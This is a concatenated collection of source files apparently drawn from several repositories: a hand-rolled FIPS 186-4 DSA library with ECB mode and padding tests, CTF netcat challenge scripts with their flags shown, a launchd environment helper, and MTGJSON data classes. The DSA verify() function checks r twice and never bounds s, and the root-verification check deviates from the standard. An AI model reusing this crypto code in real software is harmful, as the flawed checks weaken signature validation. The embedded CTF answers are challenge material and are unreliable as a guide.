# Steps 13.3, 13.4, 13.5
X = W + twoPowLMin1
c = X % twoTimesQ
computed_p = X - (c - 1)
# Step 13.6
if computed_p < twoPowLMin1:
offset = offset + n + 1
continue
# Step 13.7
if primality.millerRabin(computed_p, pTests):
if primality.lucasTest(computed_p):
# Steps 14 and 15
if i == counter and computed_p == p: return True
else: return False
# Step 13.9
offset = offset + n + 1
return False
def getFirstSeed(N: int, seedlen: int, forceWeak: bool = False):
"""Generates first seed for provable primes generation
Parameters:
N: int
Length of prime q in bits
seedlen: int
length of seed to return, must not be less than N
forceWeak: bool
Indicates if N should be checked to be approved. False by default.
Returns:
firstSeed: int
generated first seed or None if generation fails
"""
firstSeed = 0
if not forceWeak:
nIsCorrect = False
for lengths in FFC_APPROVED_LENGTHS:
nIsCorrect = nIsCorrect or (N in lengths)
else:
nIsCorrect = True
if not nIsCorrect: return None
if seedlen < N: return None
twoPowNMin1 = pow(2, N - 1)
while firstSeed < twoPowNMin1:
firstSeed = secrets.randbits(seedlen)
firstSeed |= (2 ** (seedlen - 1) + 1)
return firstSeed
def generateProvablePrimes(N: int, L: int, firstSeed: int, hashFunction: callable = hashlib.sha256, forceWeak: bool = False) -> tuple:
"""Generates provabele primes p and q by algorithm from
FIPS 186-4, Appendix A.1.2.1.2
Parameters:
N: int
Bit length of q - smaller prime
L: int
Bit length of p - bigger prime
firstSeed: int
the first seed to be used
hashFunction: callable
Hash function conforming to hashlib protocols.
Hash function output length must not be less than N
By FIPS 186-4 one of APPROVED_HASHES should be used
forceWeak: bool
Indicates if N and L should be verified to be approved lengths. False by default.
Returns:
result: tuple
tuple of generation results:
1. status: bool
True if generation was successful and False otherwise
2. p: int
Bigger prime
3. q: int
Smaller prime
4. firstSeed: int
Same as the firstSeed parameter. Will be used for verifications
5. pSeed: int
pSeed for verification function
6. qSeed: int
qSeed for verification function
7. pGenCounter: int
pGenCounter for verification function
8. qGenCounter: int
qGenCounter for verification function
"""
# Step 1
if (N, L) not in FFC_APPROVED_LENGTHS and not forceWeak: return (False, None, None, None, None, None, None, None)
# Step 2
d = primality.shaweTaylor(N, firstSeed)
if not d["status"]: return (False, None, None, None, None, None, None, None)
q = d["prime"]
qSeed = d["primeSeed"]
qGenCounter = d["primeGenCounter"]
# Step 3
# p0Length = ceil(L / 2 + 1)
if L % 2 == 0: p0Length = L // 2 + 1
else: p0Length = L // 2 + 2
d = primality.shaweTaylor(p0Length, qSeed)
if not d["status"]: return (False, None, None, None, None, None, None, None)
p0 = d["prime"]
pSeed = d["primeSeed"]
pGenCounter = d["primeGenCounter"]
outlen = hashFunction().digest_size * 8
# Step 4, 5
if L % outlen == 0: iterations = L // outlen - 1
else: iterations = L // outlen
oldCounter = pGenCounter
twoPowOutlen = pow(2, outlen)
twoPowLMin1 = pow(2, L - 1)
# Steps 6, 7
x = 0
for i in range(iterations + 1):
hashPayload = base.intToBytes(pSeed + i)
h = base.bytesToInt(hashFunction(hashPayload).digest())
x = x + h * pow(twoPowOutlen, i)
# Steps 8, 9
pSeed = pSeed + iterations + 1
x = twoPowLMin1 + (x % twoPowLMin1)
# Step 10
# t = ceil(x / (2 * q * p0))
if x % (2 * q * p0) == 0: t = x // (2 * q * p0)
else: t = x // (2 * q * p0) + 1
while True:
# Step 11
if 2 * t * q * p0 + 1 > twoPowLMin1 * 2: t = twoPowLMin1 // (2 * q * p0) + (twoPowLMin1 % (2 * q * p0) != 0)
# Steps 12, 13
p = 2 * t * q * p0 + 1
pGenCounter += 1
# Steps 14, 15
a = 0
for i in range(iterations + 1):
hashPayload = base.intToBytes(pSeed + i)
h = base.bytesToInt(hashFunction(hashPayload).digest())
a = a + h * pow(twoPowOutlen, i)
# Steps 16, 17, 18
pSeed = pSeed + iterations + 1
a = 2 + (a % (p - 3))
z = pow(a, 2 * t * q, p)
# Step 19
if 1 == base.gcd(z - 1, p) and 1 == pow(z, p0, p):
return (True, p, q, firstSeed, pSeed, qSeed, pGenCounter, qGenCounter)
# Step 20
if pGenCounter > (4 * L + oldCounter): return (False, None, None, None, None, None, None, None)
# Step 21
t += 1
def verifyProvablePrimesGenerationResult(
p: int,
q: int,
firstSeed: int,
pSeed: int,
qSeed: int,
pGenCounter: int,
qGenCounter: int,
hashFunction: callable=hashlib.sha256,
forceWeak: bool = False
) -> bool:
"""Verifies if primes were generated by algorithm from
FIPS 186-4, Appendix 1.2.2
Note that verification takes at least as much time as generation
Parameters:
p: int
Bigger prime
q: int
Smaller prime
firstSeed: int
Seed that was passed to generation function
pSeed, qSeed, pGenCounter, qGenCounter: int
Parameters returned from generation function
hashFunction: callable
Hash function thath conforms to hashlib protocols.
This function must be equal to the one used for primes generation
By default hashlib.sha256 is used
By FIPS 186-4, one of APPROVED_HASHES should be used
forceWeak: bool
Indicates if length of p and length of q should be verified to have approved bit length. False by default
Returns:
result: bool
True if verification succeeds
False if verification fails
"""
L = p.bit_length()
N = q.bit_length()
if (N, L) not in FFC_APPROVED_LENGTHS and not forceWeak: return False
if firstSeed < pow(2, N - 1): return False
if pow(2, N) <= q: return False
if pow(2, L) <= p: return False
if (p - 1) % q != 0: return False
check, checkP, checkQ, firstSeed, checkPSeed, checkQSeed, checkPGenCounter, checkQGenCounter = generateProvablePrimes(N, L, firstSeed, hashFunction, forceWeak)
if checkP != p: return False
if checkQ != q: return False
if checkPSeed != pSeed: return False
if checkQSeed != qSeed: return False
if checkPGenCounter != pGenCounter: return False
if checkQGenCounter != qGenCounter: return False
return True
def generateUnverifiableG(p: int, q: int, seed: int = 2, update: callable = lambda x: x + 1) -> tuple:
"""Generates g value for DSA according to algorithm from FIPS 186-4, Appendix A.2.1
Note, according to the standard argument seed must be unique for primes pair, but this function
will not guarantee this. It is a caller responsibility to provide seed and its update function.
Function will return seed along with g, so caller can mark it as used.
Parameters:
p: int
Bigger prime
q: int
Smaller prime
seed: int
initial value of h, see FIPS 186-4 for details
update: callable
seed update function if initial seed turned out to be inappropriate
Returns:
result: tuple
tuple of two values:
g: int
Generated primitive root
seed: int
Updated seed
"""
e = (p - 1) // q
while 1:
g = pow(seed, e, p)
if g != 1: break
seed = update(seed)
return (g, seed)
def partiallyVerifyRootGeneration(p: int, q: int, g: int) -> bool:
"""Checks partial validity of DSA parameters according to algorithm from FIPS 186-4, Appendix A.2.2
Note that this function verifies correctness, but not security. As standard states:
'The non-existence of a potentially exploitable relationship of g to another genrator g' (that is known to the entity
that generated g, but may not be know by other entities) cannot be checked'
Parameters:
p: int
Bigger prime
q: int
Smaller prime
g: int
Primitive root
Returns:
status: bool
True if parameters is partially valid.
False if parameters are definitely not valid
"""
if g < 2 or g > p - 1: return False
if pow(g, q, p) == 1: return True
return False
def generateVerifiableG(p: int, q: int, domainParameterSeed: int, index: int, hashFunction: callable=hashlib.sha256) -> int:
"""Generates verifiable root for DSA. To generate more than one root for same primes, change index
Algorithm is specified by FIPS 186-4, Appendix A.2.3
Parameters:
p: int
Bigger prime
q: int
Smaller prime
domainParameterSeed: int
The seed returned by primes generation function.
When primes generated by algorithm from Appendix A.1.1.2 the domainParameterSeed value is used
When primes generated by algorithm from Appendix A.1.2.1 the domainParameterSeed is concatenated parameters firstSeed + pSeed + qSeed
index: int
Number of root to generate. For same p and q this function can generate different roots for different index values.
Index value must be bounded to 8 bit number
hashFunction: callable
hash function that conforms to hashlib protocols. By default hashlib.sha256 is used
Returns:
result: int
Generated primitive root. May be returned None if generate goes wrong.
"""
if index.bit_length() > 8: return (False, None, None, None)
ggen = b"\x67\x67\x65\x6e"
indexBytes = base.intToBytes(index)
N = q.bit_length()
e = (p - 1) // q
count = 0
while True:
count = (count + 1) & 0xffff
if count == 0: return None
countBytes = base.intToBytes(count)
U = domainParameterSeed + ggen + indexBytes + countBytes
W = base.bytesToInt(hashFunction(U).digest())
g = pow(W, e, p)
if g >= 2:
return g
def verifyRootGeneration(
p: int,
q: int,
g: int,
domainParameterSeed: int,
index: int,
hashFunction: callable = hashlib.sha256
) -> bool:
"""Verifies that root were generated by algorithm from FIPS 186-4, Appendix A.2.4
Parameters:
p: int
Bigger prime
q: int
Smaller prime
g: int
Primitive root
domainParameterSeed: int
seed returned from primes generation function and used for root generation
index: int
Primitive root index. See generateVerifiableG for details
hashFunction: callable
hash function that conforms to hashlib protocols. Must be the same function that was used for root generation
By default hashlib.sha256 is used
Returns:
status: bool
True if root were generated by FIPS 186-4 method
False either if root is not correct at all, or if it is was not generated by FIPS 186-4
"""
if not partiallyVerifyRootGeneration(p, q, g): return False
ggen = b"\x67\x67\x65\x6e"
index = index & 0xff
indexBytes = base.intToBytes(index)
N = q.bit_length()
e = (p - 1) // q
count = 0
while True:
count = (count + 1) & 0xffff
if count == 0: return False
countBytes = base.intToBytes(count)
U = domainParameterSeed + ggen + indexBytes + countBytes
W = base.bytesToInt(hashFunction(U).digest())
computedG = pow(W, e, p)
if g > 2:
return computedG == g
def generateParams(
N: int,
L: int,
provablePrimes: bool = False,
verifiableRoot: bool = False,
hashFunction: callable = hashlib.sha256,
forceWeak: bool = False
) -> tuple:
"""Generate random DSA parameters with minimal setup.
This function is not appropriate for systems with long lifecycle.
Parameters:
N: int
bit length of q - smaller prime
L: int
bit length of p - bigger prime
provablePrimes: bool
specifies if generated primes must be provably primes. This function will not return
any parameters for primes generation verification.
By default value is False.
verifiableRoot: bool
specifies if generated root must be generated by verifiable root generation algorithm.
This function will not return any parameters for root verification.
By default value is False
hashFunction: callable
hash function to use for primes and root generation. Must conform to hashlib protocols.
By default hashlib.sha256 is used
forceWeak: bool
Indicates if N and L should be verified to be approved by the standard.
Returns:
params: tuple
tuple that contains generated p, q, and g. Will return None if passed wrong parameters,
such as (N, L) pair not from APPROVED_LENGTHS or hash function digest size less than N
"""
if (N, L) not in FFC_APPROVED_LENGTHS and not forceWeak: return None
outlen = hashFunction().digest_size * 8
if outlen < N: return None
if provablePrimes:
firstSeed = getFirstSeed(N, N,forceWeak)
result = generateProvablePrimes(N, L, firstSeed, hashFunction, forceWeak)
while result[0] == False:
firstSeed = getFirstSeed(N, N, forceWeak)
result = generateProvablePrimes(N, L, firstSeed, hashFunction, forceWeak)
else:
result = generateProbablePrimes(N, L, N, hashFunction, forceWeak)
p = result[1]
q = result[2]
domainParameterSeed = base.intToBytes(result[3])
if provablePrimes:
domainParameterSeed = domainParameterSeed + base.intToBytes(result[4]) + base.intToBytes(result[5])
if verifiableRoot:
index = 1
g = generateVerifiableG(p, q, domainParameterSeed, 1, hashFunction)
while g == None and index < 256:
index += 1
g = generateVerifiableG(p, q, domainParameterSeed, index, hashFunction)
if g == None: return None
else:
g = generateUnverifiableG(p, q)[0]
if g == None: return None
return (p, q, g)
def generateKeys(p: int, q: int, g: int, useAdditionalBits: bool = False, forceWeak: bool = False) -> tuple:
"""Generates public and private keys for DSA by algorithms specified
in FIPS 186-4, Appendix B.1.1 and B.1.2. This function implements both algorithms.
Set useAdditionalBits to True to use algorithm from B.1.1 and to False to use algorithm from B.1.2
Parameters:
p: int
Bigger prime
q: int
Smaller prime
g: int
Primitive root
useAdditionalBits: bool
Specifies the algorithm to use.
True - use FIPS 186-4, Appendix B.1.1
False - use FIPS 186-4, Appendix B.1.2
forceWeak: bool
Indicates if p and q should be verified to have approved lengths. False by default
Returns:
result: tuple
Pair of keys:
1. y: int
public exponent
2. x: int
private exponent
"""
N = q.bit_length()
L = p.bit_length()
if (N, L) not in FFC_APPROVED_LENGTHS and not forceWeak: return (None, None)
if useAdditionalBits:
c = secrets.randbits(N + 64)
x = (c % (q - 1)) + 1
else:
while True:
c = secrets.randbits(N)
if c <= q - 2: break
x = c + 1
y = pow(g, x, p)
return (y, x)
def generateSecret(p: int, q: int, useAdditionalBits: bool = False, forceWeak: bool = False) -> int:
"""Generates per-message random secret by algorithms specified in FIPS 186-4, Appendix B.2
Parameters:
p: int
Bigger prime
q: int
Smaller prime
useAdditionalBits: bool
Specifies algorithm to use
True - use FIPS 186-4, Appendix B.2.1
False - use FIPS 186-4, Appendix B.2.2
forceWeak: bool
Indicates if p and q should be verified to have approved length. False by default
Returns:
result: int
random number appropriate to use for DSA signing with given parameters.
May return None if inappropriate parameters were given
"""
N = q.bit_length()
L = p.bit_length()
if (N, L) not in FFC_APPROVED_LENGTHS and not forceWeak: return None
if useAdditionalBits:
c = secrets.randbits(N + 64)
k = (c % (q - 1)) + 1
try:
pow(k, -1, q)
except Exception:
return None
return k
else:
while True:
c = secrets.randbits(N)
if c <= q - 2: break
k = c + 1
try:
pow(k, -1, q)
except Exception:
return None
return k
def prepareMessage(
message: bytes,
q: int,
hashFunction: callable = hashlib.sha256
) -> int:
"""Processes the message before signing or verifying according to FIPS 186-4.
The procedure works as follows:
1) compute zLength = min(N, outlen),
where outlen is the length of hash function.
If hash function is not specified, then just take N
2) compute h = Hash(message) if hash function is specified, or jsut message otherwise
3) take zLength leftmost bits of h and return as an integer
So the value returned from this function can be directly inserted into signature/verification calculation
Parameters:
message: bytes
Message to process
q: int
Smaller prime
hashFunction: callable
hash function to use for message process. Must conform to hashlib protocols.
By default hashlib.sha256 is used. This value also might be None, then no hash function will be used
Returns:
result: int
Processed message as integer
"""
N = q.bit_length()
zLength = N
if hashFunction != None:
outlen = hashFunction().digest_size * 8
zLength = min(N, outlen)
message = hashFunction(message).digest()
message = base.bytesToInt(message)
if message.bit_length() > zLength:
message = message >> (message.bit_length() - zLength)
return message
def sign(
message: bytes,
p: int,
q: int,
g: int,
x: int,
secret: int,
hashFunction: callable = hashlib.sha256
) -> tuple:
"""Signs message with given private key and secret
Parmeters:
message: bytes
Message to be signed
p: int
Bigger prime
q: int
Smaller prime
g: int
Primitive root
x: int
Secret exponent
secret: int
unique random secret for message signature
hashFunction: callable
hash function for signature. This function must conform to hashlib protocols.
By default hashlib.sha256 is used.
If this value is None, message bytes will be signed instead of its hash
Returns:
result: tuple
generated signature (r, s) for message
"""
message = prepareMessage(message, q, hashFunction)
r = pow(g, secret, p) % q
s = (pow(secret, -1, q) * (message + x * r)) % q
if r == 0 or s == 0: return None
return (r, s)
def verify(
message: bytes,
p: int,
q: int,
g: int,
r: int,
s: int,
y: int,
hashFunction: callable = hashlib.sha256
) -> bool:
"""Verifies given signature
Parameters:
message: bytes
Message which signature is to be checked
p: int
Bigger prime
q: int
Smaller prime
g: int
Primitive root
r, s: int
Signature to check
y: int
Public exponent
hashFunction: callable
signature's hash function. This function must conform to hashlib protocols.
By default hashlib.sha256 is used.
If this value is None, message bytes will be verified instead of its hash
Returns:
result: bool
True if signature is valid
False if signature is invalid
"""
if r <= 0 or r >= q: return False
if s <= 0 or r >= q: return False
message = prepareMessage(message, q, hashFunction)
w = pow(s, -1, q)
u1 = (message * w) % q
u2 = (r * w) % q
v = ((pow(g, u1, p) * pow(y, u2, p)) % p) % q
return v == r
```
#### File: Symmetric/Modes/ECB.py
```python
from ptCrypt.Symmetric.Modes.Mode import Mode
from ptCrypt.Symmetric.BlockCipher import BlockCipher
from ptCrypt.Symmetric.Paddings.Padding import Padding
class ECB(Mode):
"""Electronic codebook mode of encryption. The simplest encryption mode.
Encrypts every block independently from other blocks.
More: https://en.wikipedia.org/wiki/Block_cipher_mode_of_operation#Electronic_codebook_(ECB)
"""
def __init__(self, cipher: BlockCipher, padding: Padding = None):
super().__init__(cipher, padding)
def encrypt(self, data: bytes):
if self.padding:
data = self.padding.pad(data)
blocks = self.splitBlocks(data)
for i in range(len(blocks)):
blocks[i] = self.cipher.encrypt(blocks[i])
return self.joinBlocks(blocks)
def decrypt(self, data: bytes):
if len(data) % self.cipher.blockSize:
raise BlockCipher.WrongBlockSizeException(f"Cannot process data. Data size ({len(data)}) is not multiple of the cipher block size ({self.cipher.blockSize}).")
blocks = self.splitBlocks(data)
for i in range(len(blocks)):
blocks[i] = self.cipher.decrypt(blocks[i])
decrypted = self.joinBlocks(blocks)
if self.padding:
decrypted = self.padding.unpad(decrypted)
return decrypted
```
#### File: aCrypt/test/test_padding.py
```python
from ptCrypt.Math.base import pad
from ptCrypt.Symmetric.Paddings.ZeroPadding import ZeroPadding
from ptCrypt.Symmetric.Paddings.PKCS5Padding import PKCS5Padding
def testZeroPadding():
data = b"\x11\x12\x13"
padding = ZeroPadding(4)
assert padding.pad(data) == b"\x11\x12\x13\x00"
assert padding.unpad(padding.unpad(data)) == data
def testPKCS5Padding():
data = b"\x11\x22\x33"
padding = PKCS5Padding(4)
assert padding.pad(data) == b"\x11\x22\x33\x01"
assert padding.unpad(padding.pad(data)) == data
data = b"\x11\x22\x33\x44"
padding = PKCS5Padding(4)
assert padding.pad(data) == b"\x11\x22\x33\x44\x04\x04\x04\x04"
assert padding.unpad(padding.pad(data)) == data
``` |
{
"source": "0awawa0/ctf-nc-framework",
"score": 2
} |
#### File: ctf-nc-framework/src/hello_world.py
```python
from lib.types import IStdin, IStdout
def hello(stdin: IStdin, stdout: IStdout):
stdout.write("Hello!\n")
``` |
{
"source": "0awawa0/DonNU_CTF",
"score": 4
} |
#### File: Coding/coding3/hamming_distance.py
```python
import random
from lib.types import IStdin, IStdout
def hamming_distance(a, b):
counter = 0
for i in str(bin(a ^ b)):
if i == '1': counter += 1
return counter
def main(stdin: IStdin, stdout: IStdout):
stdout.write("To get the flag you will need to calculate the Hamming distance of two numbers 100 times.\n")
stdout.write("Hamming distance is number of bits at which two numbers differ.\n")
stdout.write("Example: for 3 (011) and 5 (101) Hamming distance equals 2\n")
for i in range(100):
x, y = random.randint(1, 2 ** 32), random.randint(1, 2 ** 32)
stdout.write(f"Round {i + 1}: {x} {y}\n")
stdout.write("Answer >> ")
stdout.flush()
try:
answer = int(stdin.readline().strip())
if answer != hamming_distance(x, y):
stdout.write("Wrooong\n")
return None
except Exception:
stdout.write("You must answer with a single number\n")
return None
stdout.write("Congratulations! Your flag is donnuCTF{x0r_15_th3_answer}\n")
```
#### File: Forensic/forensic4/script.py
```python
CTF 2021/Forensic/forensic4/script.py
from PIL import Image
def toBin(arr):
res = ""
for b in arr:
res += f"{bin(b)[2:]:>08s}"
return res
def lsb_hide(img, data):
pixels = img.load()
mask = ~0x01
k = 0
for i in range(img.height):
for j in range(img.width):
r, g, b = pixels[i, j]
g = (g & mask) | (int(data[k % len(data)]) & 0x01)
pixels[i, j] = (r, g, b)
k += 1
return pixels
archive = open("flag.zip", "rb").read()
image = Image.open("forensic4.png")
lsb_hide(image, toBin(archive))
image.save("forensic4_hid.png")
```
#### File: Training_9/add_round_key/main.py
```python
import random
from lib.types import IStdin, IStdout
def main(stdin: IStdin, stdout: IStdout):
stdout.write("To get the flag you need to add 100 4x4 round key matrices to the 4x4 state matrix\n")
stdout.write("Send answers as a 1x16 vectors\n")
stdout.write("Initial state:\n")
initial_state = [random.randint(1, 50) for _ in range(16)]
for i in range(0, 16, 4):
stdout.write(f"{initial_state[i]} {initial_state[i + 1]} {initial_state[i + 2]} {initial_state[i + 3]}\n")
for k in range(100):
stdout.write(f"Round key {k + 1}:\n")
round_key = [random.randint(51, 99) for _ in range(16)]
for i in range(0, 16, 4):
stdout.write(f"{round_key[i]} {round_key[i + 1]} {round_key[i + 2]} {round_key[i + 3]}\n")
initial_state = [initial_state[i] ^ round_key[i] for i in range(16)]
try:
stdout.write("Your array >> ")
stdout.flush()
answer = stdin.readline().strip()
array = [int(i) for i in answer.split(" ")]
if array == initial_state:
stdout.write("Right\n")
else:
stdout.write("Wrooong. That's another array\n")
return
except Exception as exception:
print(exception)
stdout.write("Wrooong. That doesn't look like numbers -_-\n")
return
stdout.write("Well done! Here's your flag:" + open("src/ctf_tasks/add_round_key/flag.txt", 'r').read())
stdout.flush()
```
#### File: Training_9/array_to_hex/array_to_hex.py
```python
from lib.types import IStdin, IStdout
import random
def main(stdin: IStdin, stdout: IStdout):
stdout.write("In this task you will need to convert given array into a single hex string 100 times\n")
for i in range(100):
a = [random.randint(0, 255) for _ in range(random.randint(10, 100))]
stdout.write(f"Array {i + 1}: {' '.join(map(str, a))}\n")
stdout.write("Answer >> ")
stdout.flush()
answer = stdin.readline().strip()
if answer != "".join([hex(j)[2:] for j in a]):
stdout.write("Wrong!\n")
return
stdout.write("Flag: donnuCTF{just_h3xlify}\n")
```
#### File: Training_9/filter_the_array/filter_the_array_easy.py
```python
from lib.types import IStdin, IStdout
import random
def apply_filters(a):
res = []
for i in range(len(a)):
if a[i] == 0:
res.append(a[i])
if not a[i] % 5:
continue
if a[i] % 2 and i % 2:
continue
if not (a[i] % 2) and not (i % 2):
continue
res.append(a[i])
return res
def main(stdin: IStdin, stdout: IStdout):
stdout.write("For given array apply the following filters:\n")
stdout.write(" - never delete 0\n")
stdout.write(" - delete number if it is multiple by 5\n")
stdout.write(" - delete number if it is even and is on even position\n")
stdout.write(" - delete number if it is odd and is on odd position\n")
a = [random.randint(0, 1000) for _ in range(random.randint(10, 100))]
a.append(0)
random.shuffle(a)
stdout.write(f"Array: {' '.join(map(str, a))}\n")
stdout.write("Answer >> ")
stdout.flush()
filtered = apply_filters(a)
try:
answer = list(map(int, stdin.readline().strip().split(" ")))
if filtered != answer:
stdout.write(f"Wroong! It was: {filtered}\n")
return
except Exception:
stdout.write("Wrong input.\n")
return
stdout.write("Good job! Flag: donnuCTF{jus7_r3m0v3_som37thing}\n")
```
#### File: Training_2/Mersenne dancing the twist/task.py
```python
def encrypt(y):
y = y ^ y >> 11
y = y ^ y << 7 & 2636928640
y = y ^ y << 15 & 4022730752
y = y ^ y >> 18
return y
flag = open("flag", 'rb').read().strip()
encrypted = list(map(encrypt, flag))
print(encrypted)
# 151130148, 189142078, 184947887, 184947887, 155324581, 4194515, 16908820, 16908806, 172234346, 138416801, 151130230, 134222386, 155324647, 151130228, 155324645, 134222434, 155324647, 134222384, 151130148, 155324597, 138416883, 151130230, 134222434, 151130230, 151130230, 138416883, 151130148, 155324597, 172234280, 134222434, 168040121, 172234280, 151130150, 172234280, 151130228, 138416881, 138416801, 155324645, 134222384, 151130230, 151130230, 189142060
``` |
{
"source": "0az/dotfiles",
"score": 3
} |
#### File: .config/launchd/setenv.py
```python
from __future__ import print_function
import argparse
import logging
import os
import pprint
import shlex
import string
import subprocess
import sys
from logging import StreamHandler
from logging.handlers import SysLogHandler
ALPHABET = frozenset(string.ascii_letters)
IDENTIFIER_START = ALPHABET | set('_')
IDENTIFIER = IDENTIFIER_START | set(string.digits)
logger = logging.getLogger()
syslog_sock = None
if os.path.exists('/var/run/syslog'):
syslog_sock = '/var/run/syslog'
elif os.path.exists('/dev/log'):
syslog_sock = '/dev/log'
logger.setLevel(logging.DEBUG)
logger.addHandler(StreamHandler(sys.stdout))
if syslog_sock:
logger.addHandler(SysLogHandler(syslog_sock))
def validate_name(name):
if not name:
return False
if not name[0] in IDENTIFIER_START:
return False
if not set(name) <= IDENTIFIER:
return False
return True
def sanitize_name(name):
name = name.strip()
if not validate_name(name):
raise ValueError('Invalid Name')
return name
def process_value(value):
if not value:
return ''
if value.isspace():
logger.warn(
'Value %s consists solely of spaces - is this a bug?' % repr(value)
)
logger.warn(
'Replacing whitespace value %s with empty string' % repr(value)
)
return ''
orig = value
if value[0].isspace():
logger.warn('Stripping leading space in value=%s' % repr(orig))
value = value.lstrip()
if value[-1].isspace():
logger.warn('Stripping trailing space in value=%s' % repr(orig))
value = value.rstrip()
words = shlex.split(value)
if len(words) > 1:
logger.warn(
'Value %s splits to multiple arguments, joining' % repr(orig)
)
else:
value = words[0]
result = os.path.expandvars(value)
result = os.path.expanduser(result)
return result
def post_process(name, value):
folded = name.upper().lower()
if folded == 'PATH':
lst = value.split(':')
value = ':'.join(os.path.expanduser(elem) for elem in lst)
os.environ[name] = value
return name, value
def process_line(line):
if not line.strip() or line.startswith('#'):
return None, None
tup = line.strip().split('=', 1)
if len(tup) < 2:
raise ValueError("Missing '=' in line %s" % repr(line))
name, value = tup
if not validate_name(name):
try:
name = sanitize_name()
logger.warning(
'Sanitized invalid line: name=%s, value=%s'
% (repr(name), repr(value))
)
except ValueError:
logger.error(
'Skipping invalid line: name=%s, value=%s'
% (repr(name), repr(value))
)
return None, None
value = process_value(value)
name, value = post_process(name, value)
return name, value
def main():
logger.info('Starting setenv script')
env = {name: val for name, val in os.environ.items() if name in ('HOME')}
os.environ.clear()
for name, val in env.items():
os.environ[name] = val
s = pprint.pformat(os.environ)
logger.debug(s)
parser = argparse.ArgumentParser()
parser.add_argument('-n', '--dry-run', action='store_true')
args = parser.parse_args()
directory = os.path.dirname(__file__) or '.'
invocation = ['/bin/launchctl', 'setenv']
with open(os.path.join(directory, 'launchd.env')) as f:
for line in f:
name, value = process_line(line)
if not name:
continue
invocation.append(name)
invocation.append(value)
level = logging.INFO if args.dry_run else logging.DEBUG
for name, value in zip(invocation[2::2], invocation[3::2]):
logger.log(level, '%s=%s' % (name, repr(value)))
s = pprint.pformat(os.environ)
logger.debug(s)
if args.dry_run:
return 0
return subprocess.call(invocation)
if __name__ == '__main__':
sys.exit(main())
``` |
{
"source": "0az/mtgjson",
"score": 3
} |
#### File: mtgjson5/classes/mtgjson_game_formats.py
```python
from typing import List
from mtgjson5.utils import to_camel_case
class MtgjsonGameFormatsObject:
"""
MTGJSON Singular Card.GameFormats Object
"""
paper: bool
mtgo: bool
arena: bool
shandalar: bool
dreamcast: bool
def __init__(self) -> None:
"""
Empty initializer
"""
def to_json(self) -> List[str]:
"""
Support json.dump()
:return: JSON serialized object
"""
return [
to_camel_case(key)
for key, value in self.__dict__.items()
if "__" not in key and not callable(value) and value
]
```
#### File: mtgjson5/classes/mtgjson_set.py
```python
from typing import Any, Dict, List, Optional, Set
from ..classes.mtgjson_card import MtgjsonCardObject
from ..classes.mtgjson_translations import MtgjsonTranslationsObject
from ..utils import to_camel_case
class MtgjsonSetObject:
"""
MTGJSON Singular Set Object
"""
base_set_size: int
block: str
booster: Optional[Dict[str, Any]]
cards: List[MtgjsonCardObject]
code: str
code_v3: str
is_foreign_only: bool
is_foil_only: bool
is_non_foil_only: bool
is_online_only: bool
is_partial_preview: bool
keyrune_code: str
mcm_id: Optional[int]
mcm_name: Optional[str]
mtgo_code: str
name: str
parent_code: str
release_date: str
tcgplayer_group_id: Optional[int]
tokens: List[MtgjsonCardObject]
total_set_size: int
translations: MtgjsonTranslationsObject
type: str
extra_tokens: List[Dict[str, Any]]
search_uri: str
__allow_if_falsey = {
"cards",
"tokens",
"is_foil_only",
"is_online_only",
"base_set_size",
"total_set_size",
}
def __init__(self) -> None:
"""
Initializer to ensure arrays are pre-loaded
"""
self.extra_tokens = []
self.cards = []
self.tokens = []
def __str__(self) -> str:
"""
MTGJSON Set as a string for debugging purposes
:return MTGJSON Set as a string
"""
return str(vars(self))
def build_keys_to_skip(self) -> Set[str]:
"""
Build this object's instance of what keys to skip under certain circumstances
:return What keys to skip over
"""
excluded_keys: Set[str] = {
"added_scryfall_tokens",
"search_uri",
"extra_tokens",
}
for key, value in self.__dict__.items():
if not value:
if key not in self.__allow_if_falsey:
excluded_keys.add(key)
return excluded_keys
def to_json(self) -> Dict[str, Any]:
"""
Support json.dump()
:return: JSON serialized object
"""
skip_keys = self.build_keys_to_skip()
return {
to_camel_case(key): value
for key, value in self.__dict__.items()
if "__" not in key and not callable(value) and key not in skip_keys
}
```
#### File: mtgjson5/classes/mtgjson_translations.py
```python
from typing import Any, Dict, Optional
class MtgjsonTranslationsObject:
"""
MTGJSON Set.Translations Object
"""
chinese_simplified: Optional[str]
chinese_traditional: Optional[str]
french: Optional[str]
german: Optional[str]
italian: Optional[str]
japanese: Optional[str]
korean: Optional[str]
portuguese_ob_brazil_cb: Optional[str]
russian: Optional[str]
spanish: Optional[str]
def __init__(self, active_dict: Dict[str, str] = None) -> None:
"""
Initializer, for each language, given the contents
"""
if not active_dict:
return
self.chinese_simplified = active_dict.get("Chinese Simplified")
self.chinese_traditional = active_dict.get("Chinese Traditional")
self.french = active_dict.get("French")
self.german = active_dict.get("German")
self.italian = active_dict.get("Italian")
self.japanese = active_dict.get("Japanese")
self.korean = active_dict.get("Korean")
self.portuguese_ob_brazil_cb = active_dict.get("Portuguese (Brazil)")
self.russian = active_dict.get("Russian")
self.spanish = active_dict.get("Spanish")
@staticmethod
def parse_key(key: str) -> str:
"""
Custom parsing of translation keys
:param key: Key to translate
:return: Translated key for JSON
"""
key = key.replace("ob_", "(").replace("_cb", ")")
components = key.split("_")
return " ".join(x.title() for x in components)
def to_json(self) -> Dict[str, Any]:
"""
Support json.dump()
:return: JSON serialized object
"""
return {
self.parse_key(key): value
for key, value in self.__dict__.items()
if "__" not in key and not callable(value)
}
```
#### File: mtgjson5/compiled_classes/mtgjson_card_types.py
```python
import re
import string
from typing import Any, Dict, List, Match, Optional
from ..providers.scryfall import ScryfallProvider
from ..providers.wizards import WizardsProvider
from ..utils import parse_magic_rules_subset, to_camel_case
class MtgjsonCardTypesObject:
"""
MTGJSON CardTypes Object
"""
class MtgjsonCardTypesInnerObject:
"""
MTGJSON CardTypes.CardTypesInner Object
"""
artifact: List[str]
conspiracy: List[str]
creature: List[str]
enchantment: List[str]
instant: List[str]
land: List[str]
phenomenon: List[str]
plane: List[str]
planeswalker: List[str]
scheme: List[str]
sorcery: List[str]
tribal: List[str]
vanguard: List[str]
def __init__(self, magic_rules: str) -> None:
"""
Internal initializer
:param magic_rules: Rules for MTG from Wizards
"""
planar_regex = re.compile(r".*The planar types are (.*)\.")
self.artifact = ScryfallProvider().get_catalog_entry("artifact-types")
self.conspiracy = []
self.creature = ScryfallProvider().get_catalog_entry("creature-types")
self.enchantment = ScryfallProvider().get_catalog_entry("enchantment-types")
self.instant = ScryfallProvider().get_catalog_entry("spell-types")
self.land = ScryfallProvider().get_catalog_entry("land-types")
self.phenomenon = []
self.plane = regex_str_to_list(planar_regex.search(magic_rules))
